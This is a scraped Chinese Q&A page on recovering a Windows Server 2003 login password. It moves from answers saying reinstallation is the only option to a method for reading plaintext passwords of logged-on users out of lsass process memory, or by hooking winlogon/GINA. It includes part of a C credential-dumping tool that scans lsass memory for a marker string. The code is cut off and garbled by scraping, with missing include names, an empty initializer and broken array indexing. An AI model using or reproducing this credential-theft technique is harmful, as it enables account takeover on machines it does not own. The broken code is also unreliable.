高考问答七里香弹奏谱:如何找回windows2003登陆密码
来源:百度文库 编辑:高考问答 时间:2024/04/30 03:36:51
没有办法找回的,只有重装系统!我都做过这样的实验了!我们是学网络的,刚好接触了2003这个系统!
挂硬盘 把Sam删掉试一下吧 估计也是不行的
03的加密性更高 算法不好破
没有办法找回的,只有重装系统!
到安全模式下选择 VGA模式 试试看!~~~
提高成功率的两种做法:
1.程序直接写成服务,定时检查本地或远程登陆(其实没什么分别),当检测到登陆后,去搜索lsass进程内存,尝试得到密码。
2.程序模拟一个登陆(使用LogonUser()就能搞定),因为使用LogonUser()这个API,你要提供帐号名和对应的正确的密码,才可以成功,然后你就可以去搜索lsass进程内存。因为知道密码是什么,我们就能定位到密码是保存在什么地方。因为登陆用户的密码都是保存在同一个地址或相离不远的地址中,模拟登陆和搜索,可以先定位以后登陆的用户的密码会大约保存在什么位置。
无论怎说,三种方法中,最稳定,最安全的方法还是使用Gina那种方法.Hijack了winlogn一些API的方法,毕竟是改动了系统的东西,对系统的稳定性来说,会有考验,直接搜索lsass进程内存的方法呢,虽说也是困难,但准确性,成功率却又是低。
下面的代码使用的是很笨,而且很原始的搜索方法,主要是搜索Lsass内存中"LocalSystem Remote Procedure"这个字符串,因为在相当多的测试中,密码都是保存在有这个字符串的地址后一点的位置中,当然了,很多系统并没有这个字符串,或者就算有,我们得到的都是错误的密码。
代码: //********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
// Used Is Pretty Unwise,But This May Be The Only Way To Review The
// Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include
#include
#include
#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable
char Password[MAX_PATH] = ; // Store The Found Password
// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID);
int Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration
int main()
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");
if (!Is2003()) // Check Out If The Box Is 2003
{
printf("The Program Can't Only Run On Windows 2003 Platform\n");
return -1;
}
PID = GetLsassPID(); // Get The Lsass.exe PID
if (PID == 0) // Fail To Get PID If Returning Zerom
{
return -1;
}
FindPassword(PID); // Find The Password From Lsass.exe Memory
return 0;
}
// End main()
//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
// Since The Password Is Near The Above Location,But It's Not Always True That
// We Will Find The Magic String,Or Even We Find It,The Password May Be Located
// At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i < nSize ; i++)
{
/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
The Magic String,We Have To Do It Manually And Slowly
*/
if (Buffer == 'L')
{
OffSet = 0;
if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
{
OffSet += strlen("LocalSystem") + 1;
if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
{
OffSet += strlen("Remote") + 1;
if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
{
OffSet += strlen("Procedure") + 1;
if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
{
i += OffSet;
break;
}
}
}
}
}
}